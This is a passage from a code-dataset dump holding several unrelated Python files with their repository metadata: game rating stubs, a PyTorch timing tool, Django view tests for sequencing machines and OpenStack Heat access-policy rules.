class NA_TahmKench_Mid_Shyvana(Ratings):
pass
class NA_TahmKench_Mid_Singed(Ratings):
pass
class NA_TahmKench_Mid_Sion(Ratings):
pass
class NA_TahmKench_Mid_Sivir(Ratings):
pass
class NA_TahmKench_Mid_Skarner(Ratings):
pass
class NA_TahmKench_Mid_Sona(Ratings):
pass
class NA_TahmKench_Mid_Soraka(Ratings):
pass
class NA_TahmKench_Mid_Swain(Ratings):
pass
class NA_TahmKench_Mid_Syndra(Ratings):
pass
class NA_TahmKench_Mid_TahmKench(Ratings):
pass
class NA_TahmKench_Mid_Taliyah(Ratings):
pass
class NA_TahmKench_Mid_Talon(Ratings):
pass
class NA_TahmKench_Mid_Taric(Ratings):
pass
class NA_TahmKench_Mid_Teemo(Ratings):
pass
class NA_TahmKench_Mid_Thresh(Ratings):
pass
class NA_TahmKench_Mid_Tristana(Ratings):
pass
class NA_TahmKench_Mid_Trundle(Ratings):
pass
class NA_TahmKench_Mid_Tryndamere(Ratings):
pass
class NA_TahmKench_Mid_TwistedFate(Ratings):
pass
class NA_TahmKench_Mid_Twitch(Ratings):
pass
class NA_TahmKench_Mid_Udyr(Ratings):
pass
class NA_TahmKench_Mid_Urgot(Ratings):
pass
class NA_TahmKench_Mid_Varus(Ratings):
pass
class NA_TahmKench_Mid_Vayne(Ratings):
pass
class NA_TahmKench_Mid_Veigar(Ratings):
pass
class NA_TahmKench_Mid_Velkoz(Ratings):
pass
class NA_TahmKench_Mid_Vi(Ratings):
pass
class NA_TahmKench_Mid_Viktor(Ratings):
pass
class NA_TahmKench_Mid_Vladimir(Ratings):
pass
class NA_TahmKench_Mid_Volibear(Ratings):
pass
class NA_TahmKench_Mid_Warwick(Ratings):
pass
class NA_TahmKench_Mid_Xayah(Ratings):
pass
class NA_TahmKench_Mid_Xerath(Ratings):
pass
class NA_TahmKench_Mid_XinZhao(Ratings):
pass
class NA_TahmKench_Mid_Yasuo(Ratings):
pass
class NA_TahmKench_Mid_Yorick(Ratings):
pass
class NA_TahmKench_Mid_Zac(Ratings):
pass
class NA_TahmKench_Mid_Zed(Ratings):
pass
class NA_TahmKench_Mid_Ziggs(Ratings):
pass
class NA_TahmKench_Mid_Zilean(Ratings):
pass
class NA_TahmKench_Mid_Zyra(Ratings):
pass
| 16.688249 | 46 | 0.780572 | 972 | 6,959 | 5.162551 | 0.151235 | 0.192507 | 0.440016 | 0.522519 | 0.819051 | 0.819051 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159649 | 6,959 | 416 | 47 | 16.728365 | 0.858071 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
80fe31c3aefdaccaae877a965dfa7f1bec006821 | 43 | py | Python | src/lib/sre_compile.py | DTenore/skulpt | 098d20acfb088d6db85535132c324b7ac2f2d212 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | src/lib/sre_compile.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | src/lib/sre_compile.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import _sk_fail; _sk_fail._("sre_compile")
| 21.5 | 42 | 0.790698 | 7 | 43 | 4 | 0.714286 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.255814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0380a906483de0d0bd7facd4ba3ee4af9934c511 | 95 | py | Python | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T03:06:32.000Z | 2020-02-04T03:06:32.000Z | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | null | null | null | games/pyxel-games-master/WhatAmI/utils.py | rkrishnasanka/Pyxel-Paradise-Launcher | 16727098bbc7acfbb26d34331505a18da60a2649 | [
"BSD-3-Clause"
] | null | null | null | import math
def get_tile_from_pos(x, y):
return (math.floor(y / 8), math.floor(x / 8)) | 23.75 | 53 | 0.631579 | 18 | 95 | 3.166667 | 0.666667 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0.210526 | 95 | 4 | 53 | 23.75 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
0392c01c80c751ff0aa087ae1f36628c1d84b242 | 202 | py | Python | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | 5 | 2019-01-31T19:47:52.000Z | 2019-03-06T09:44:47.000Z | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | kirby/builtins/available_plugins/routes.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | import json
from kirby.core import web_api
from .controller import get_all_available_plugins
@web_api.route('/')
def get_available_plugins_route():
return json.dumps(get_all_available_plugins())
| 20.2 | 50 | 0.806931 | 30 | 202 | 5.066667 | 0.533333 | 0.315789 | 0.197368 | 0.289474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108911 | 202 | 9 | 51 | 22.444444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.5 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 7 |
03ee7db85a1eb441860e09d31b2166b08f149537 | 2,230 | py | Python | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 10 | 2018-02-26T04:51:11.000Z | 2021-10-01T02:30:37.000Z | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 9 | 2017-11-16T16:11:16.000Z | 2020-02-13T13:10:55.000Z | pytorch_toolbox/probe/runtime.py | MathGaron/pytorch_toolbox | 2afd13e50ba71dfce66467a4b070d9b922668502 | [
"MIT"
] | 7 | 2018-02-12T19:06:14.000Z | 2021-03-25T19:13:51.000Z | import torch
from torch.autograd import Variable
import time
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
def compute_test_time(network_class, input_size, max_batch_size, step_size=1, is_cuda=False):
backend = "cpu"
if is_cuda:
backend = "cuda"
model = network_class()
if is_cuda:
model = model.cuda()
model.eval()
time_log = []
# make sure that everything is in memorybefore the actual tests
batch = Variable(torch.FloatTensor(1, *input_size))
if is_cuda:
batch = batch.cuda()
model(batch)
print("Compute {} test time".format(backend))
for i in tqdm(range(0, max_batch_size, step_size)):
batch = Variable(torch.FloatTensor(i+1, *input_size))
if is_cuda:
batch = batch.cuda()
time_start = time.time()
model(batch)
time_log.append(time.time() - time_start)
plt.plot(np.arange(1, max_batch_size + 1, step_size), time_log)
plt.title("{} test time w.r.t minibatch size".format(backend))
plt.ylabel("Time (s)")
plt.xlabel("Batch size")
def compute_train_time(network_class, input_size, max_batch_size, step_size=1, is_cuda=False, backward_only=False):
backend = "cpu"
if is_cuda:
backend = "cuda"
model = network_class()
if is_cuda:
model = model.cuda()
model.train()
time_log = []
# make sure that everything is in memorybefore the actual tests
batch = Variable(torch.FloatTensor(1, *input_size))
if is_cuda:
batch = batch.cuda()
model(batch)
print("Compute {} test time".format(backend))
for i in tqdm(range(0, max_batch_size, step_size)):
batch = Variable(torch.FloatTensor(i+1, *input_size))
if is_cuda:
batch = batch.cuda()
time_start = time.time()
prediction = model(batch)
out = torch.sum(prediction)
if backward_only:
time_start = time.time()
out.backward()
time_log.append(time.time() - time_start)
plt.plot(np.arange(1, max_batch_size + 1, step_size), time_log)
plt.title("{} train time w.r.t minibatch size".format(backend))
plt.ylabel("Time (s)")
plt.xlabel("Batch size") | 31.857143 | 115 | 0.643049 | 315 | 2,230 | 4.377778 | 0.212698 | 0.04351 | 0.04641 | 0.04641 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0.808557 | 0 | 0.007071 | 0.239013 | 2,230 | 70 | 116 | 31.857143 | 0.805539 | 0.055157 | 0 | 0.733333 | 0 | 0 | 0.074584 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.1 | 0 | 0.133333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
03fe732f4d809199493b38ad904ff9d1e867457e | 14,498 | py | Python | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 13 | 2019-11-27T19:12:15.000Z | 2021-12-01T21:32:18.000Z | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 60 | 2019-03-27T14:43:19.000Z | 2022-03-22T09:12:53.000Z | sequencers/tests/test_views.py | bihealth/digestiflow-server | 298c53f95dbf56e7be0d0b8bcceacabc21257d5f | [
"MIT"
] | 3 | 2020-11-09T07:08:42.000Z | 2022-02-09T11:37:54.000Z | # TODO: check timeline events
from django.shortcuts import reverse
from test_plus.test import TestCase
from digestiflow.test_utils import SetupUserMixin, SetupProjectMixin, AuthenticatedRequestMixin
from ..models import INDEX_WORKFLOW_A, MACHINE_MODEL_HISEQ2000, SequencingMachine
from ..tests import SetupSequencingMachineMixin
class SequencingMachineListViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineListView``"""
def runGet(self, user, project=None):
return super().runGet(
user, "sequencers:sequencer-list", project=(project or self.project).sodar_uuid
)
def testGet(self):
"""Test that rendering the machine list works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.norole, None, self.unrelated_owner):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
def testAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.guest, self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object_list")
class SequencingMachineDetailViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineDetailView``"""
def runGet(self, user, project=None):
return super().runGet(
user,
"sequencers:sequencer-detail",
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
)
def testGet(self):
"""Test that rendering the machine detail works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.guest, self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
def testGetAccessDenied(self):
"""Test that access is allowed if role assignment is missing"""
for user in (self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, self.unrelated_project)
self.response_404()
class SequencingMachineCreateViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineCreateView``"""
url_name = "sequencers:sequencer-create"
def setUp(self):
super().setUp()
self.form_data = {
"vendor_id": "Hzzzzzzzz",
"label": "Another test machine",
"machine_model": MACHINE_MODEL_HISEQ2000,
"slot_count": 2,
"dual_index_workflow": INDEX_WORKFLOW_A,
}
def runGet(self, user, project=None):
return super().runGet(user, self.url_name, project=(project or self.project).sodar_uuid)
def runPost(self, user, data, project=None):
return super().runPost(
user, self.url_name, project=(project or self.project).sodar_uuid, data=data
)
def testGet(self):
"""Test that rendering the machine create form works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("form")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("form")
def testPost(self):
"""Test that the create view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, self.form_data)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
self.assertEqual(SequencingMachine.objects.count(), 2)
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None, self.unrelated_owner):
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, data=self.form_data)
self.assertUnauthorizedRedirect(user, response)
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
SequencingMachine.objects.all().delete()
response = self.runPost(user, data=self.form_data)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_200(response)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
class SequencingMachineUpdateViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineUpdateView``"""
url_name = "sequencers:sequencer-update"
def setUp(self):
super().setUp()
self.form_data = {
"vendor_id": "Haaaaaaaa",
"label": "UPDATED",
"machine_model": MACHINE_MODEL_HISEQ2000,
"slot_count": 2,
"dual_index_workflow": INDEX_WORKFLOW_A,
}
def runGet(self, user, project=None):
return super().runGet(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
)
def runPost(self, user, data, project=None):
return super().runPost(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=self.hiseq2000.sodar_uuid,
data=data,
)
def testGet(self):
"""Test that rendering the machine update form works (with super user)"""
response = self.runGet(self.root)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
self.assertInContext("form")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, self.unrelated_project)
self.response_404()
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
self.assertInContext("form")
def testPost(self):
"""Test that the update view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, self.form_data)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
self.assertEqual(SequencingMachine.objects.count(), 1)
instrument = SequencingMachine.objects.first()
self.assertEqual(instrument.vendor_id, self.form_data["vendor_id"])
self.assertEqual(instrument.label, self.form_data["label"])
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None):
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, data=self.form_data)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runPost(self.unrelated_owner, data=self.form_data, project=self.unrelated_project)
self.response_404()
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runPost(user, data=self.form_data)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_200(response)
self.assertRedirects(
response,
SequencingMachine.objects.order_by("-date_created").first().get_absolute_url(),
fetch_redirect_response=False,
)
class SequencingMachineDeleteViewTest(
AuthenticatedRequestMixin,
SetupSequencingMachineMixin,
SetupProjectMixin,
SetupUserMixin,
TestCase,
):
"""Test the ``SequencingMachineDeleteView``"""
url_name = "sequencers:sequencer-delete"
def setUp(self):
super().setUp()
def runGet(self, user, sequencer, project=None):
return super().runGet(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=sequencer.sodar_uuid,
)
def runPost(self, user, sequencer, project=None):
return super().runPost(
user,
self.url_name,
project=(project or self.project).sodar_uuid,
sequencer=sequencer.sodar_uuid,
)
def testGet(self):
"""Test that rendering the machine update form works (with super user)"""
response = self.runGet(self.root, self.hiseq2000)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testGetAccessDenied(self):
"""Test that access is denied if role assignment is missing"""
for user in (self.guest, self.norole, None):
response = self.runGet(user, self.hiseq2000)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
self.runGet(self.unrelated_owner, sequencer=self.hiseq2000, project=self.unrelated_project)
self.response_404()
def testAccessAllowed(self):
"""Test that access is denied if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
response = self.runGet(user, self.hiseq2000)
self.response_200(response)
self.assertInContext("project")
self.assertInContext("object")
def testPost(self):
"""Test that the delete view works (with super user)"""
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(self.root, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 0)
self.response_200(response)
self.assertRedirects(
response,
reverse("sequencers:sequencer-list", kwargs={"project": self.project.sodar_uuid}),
fetch_redirect_response=False,
)
def testPostAccessDenied(self):
"""Test that access is denied if necessary role assignment is missing"""
for user in (self.norole, self.guest, None):
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 1)
self.assertUnauthorizedRedirect(user, response)
# Members of unrelated projects should not be able to see the object in their project...
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(
self.unrelated_owner,
sequencer=SequencingMachine.objects.first(),
project=self.unrelated_project,
)
self.assertEqual(SequencingMachine.objects.count(), 1)
self.response_404(response)
def testPostAccessAllowed(self):
"""Test that access is allowed if role assignment is correct"""
for user in (self.contributor, self.delegate, self.owner, self.root):
SequencingMachine.objects.all().delete()
self.make_machine()
self.assertEqual(SequencingMachine.objects.count(), 1)
response = self.runPost(user, SequencingMachine.objects.first())
self.assertEqual(SequencingMachine.objects.count(), 0)
self.response_200(response)
self.assertRedirects(
response,
reverse("sequencers:sequencer-list", kwargs={"project": self.project.sodar_uuid}),
fetch_redirect_response=False,
)
| 39.289973 | 99 | 0.648641 | 1,502 | 14,498 | 6.178429 | 0.092543 | 0.047845 | 0.031034 | 0.031034 | 0.894935 | 0.878556 | 0.875216 | 0.817672 | 0.803341 | 0.798384 | 0 | 0.010585 | 0.250655 | 14,498 | 368 | 100 | 39.396739 | 0.843612 | 0.144227 | 0 | 0.798587 | 0 | 0 | 0.043489 | 0.014931 | 0 | 0 | 0 | 0.002717 | 0.176678 | 1 | 0.123675 | false | 0 | 0.017668 | 0.028269 | 0.19788 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ff1711e6c129402e09892db6af6aed09d07bf428 | 39,893 | py | Python | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | skyline_apiserver/policy/manager/heat.py | openstack/skyline-apiserver | 60144767cd5513bd581fbb8eac7791887d5b276f | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
from . import base
list_rules = (
base.Rule(
name="context_is_admin",
check_str=("(role:admin and is_admin_project:True) OR (role:admin and system_scope:all)"),
description="Decides what is required for the 'is_admin:True' check to succeed.",
),
base.Rule(
name="project_admin",
check_str=("role:admin"),
description="Default rule for project admin.",
),
base.Rule(
name="deny_stack_user",
check_str=("not role:heat_stack_user"),
description="Default rule for deny stack user.",
),
base.Rule(
name="deny_everybody",
check_str=("!"),
description="Default rule for deny everybody.",
),
base.Rule(
name="allow_everybody",
check_str=(""),
description="Default rule for allow everybody.",
),
base.Rule(
name="cloudformation:ListStacks",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:CreateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStacks",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DeleteStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:UpdateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:CancelUpdateStack",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackEvents",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:ValidateTemplate",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:GetTemplate",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:EstimateTemplateCost",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackResource",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or (role:heat_stack_user and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:DescribeStackResources",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="cloudformation:ListStackResources",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::Flavor",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::EncryptedVolumeType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::VolumeType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::Quota",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Manila::ShareType",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::ProviderNet",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSPolicy",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSBandwidthLimitRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSDscpMarkingRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::QoSMinimumBandwidthRule",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Neutron::Segment",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Nova::HostAggregate",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::QoSSpecs",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Cinder::QoSAssociation",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Keystone::*",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Blazar::Host",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::Flavor",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="resource_types:OS::Octavia::FlavorProfile",
check_str=("rule:project_admin"),
description="No description",
),
base.Rule(
name="service:index",
check_str=("role:reader and system_scope:all"),
description="No description",
),
base.APIRule(
name="actions:action",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Performs non-lifecycle operations on the stack (Snapshot, Resume, Cancel update, or check stack resources). This is the default for all actions but can be overridden by more specific policies for individual actions.",
scope_types=["project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:snapshot",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create stack snapshot",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:suspend",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Suspend a stack.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:resume",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Resume a suspended stack.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:check",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Check stack resources.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:cancel_update",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Cancel stack operation and roll back.",
scope_types=["system", "project"],
operations=[
{"method": "POST", "path": "/v1/{tenant_id}/stacks/{stack_name}/{stack_id}/actions"},
],
),
base.APIRule(
name="actions:cancel_without_rollback",
check_str=(
